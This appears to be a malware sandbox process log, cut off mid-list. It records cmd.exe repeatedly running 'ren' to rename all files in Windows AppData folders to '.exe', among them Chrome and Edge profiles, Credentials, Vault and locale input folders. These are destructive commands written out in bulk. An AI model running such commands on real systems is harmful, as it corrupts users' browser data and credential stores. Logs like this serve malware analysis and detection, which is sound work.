"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Credentials\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\af-ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-AE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-BH\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-DZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-EG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-IQ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-JO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-KW\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LY\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-MA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-OM\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-QA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SY\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-TN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-YE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\az-Latn-AZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bg-BG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bn-BD\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ca-ES\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\cs-CZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\da-DK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-AT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-CH\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-DE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LI\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LU\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\el-GR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-AU\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-029\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-BZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-CA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-GB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-HK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ID\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-JM\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-MY\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-NZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-SG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-TT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZW\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-419\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-AR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-BO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CL\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-DO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-EC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-ES\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-GT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-HN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-MX\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-NI\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PY\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-SV\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-US\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-UY\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-VE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\et-EE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\eu-ES\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fa-IR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fi-FI\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-029\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-BE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CD\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CH\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CI\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CM\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-FR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-HT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-LU\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MA\*.*" "*.exe"
